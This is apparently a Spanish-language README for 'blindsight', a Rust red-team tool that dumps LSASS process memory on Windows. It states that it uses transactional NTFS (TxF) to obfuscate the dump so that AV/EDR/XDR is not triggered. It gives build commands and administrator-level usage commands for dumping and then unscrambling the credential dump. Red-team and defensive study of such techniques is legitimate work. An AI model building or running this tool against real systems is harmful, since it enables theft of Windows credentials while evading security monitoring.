
Herramienta de red team para volcar la memoria de LSASS, evadiendo contramedidas básicas.
"No existe la supervivencia del más apto.
Supervivencia del más adecuado, quizás.
No importa si una solución es óptima.
Lo único que importa es si supera a la alternativa."-- Peter Watts, Blindsight (2006)
Herramienta de red team para volcar la memoria de LSASS, evadiendo contramedidas básicas. Utiliza NTFS transaccional (API TxF) para ofuscar de forma transparente el volcado de memoria, con el fin de evitar activar AV/EDR/XDR.
$ brew install mingw-w64
$ rustup target add x86_64-pc-windows-gnu
$ cargo build --release --target x86_64-pc-windows-gnu
Dentro de una ventana de PowerShell como Administrador:
C:\> .\blindsight.exe [dump | file_to_unscramble.log]
Volcar la memoria de LSASS:
C:\> .\blindsight.exe
Desofuscar el volcado de memoria:
C:\> .\blindsight.exe 29ABE9Hy.log
[!CAUTION] No probar en servidores de producción, ya que el acceso a LSASS podría causar inestabilidad del sistema.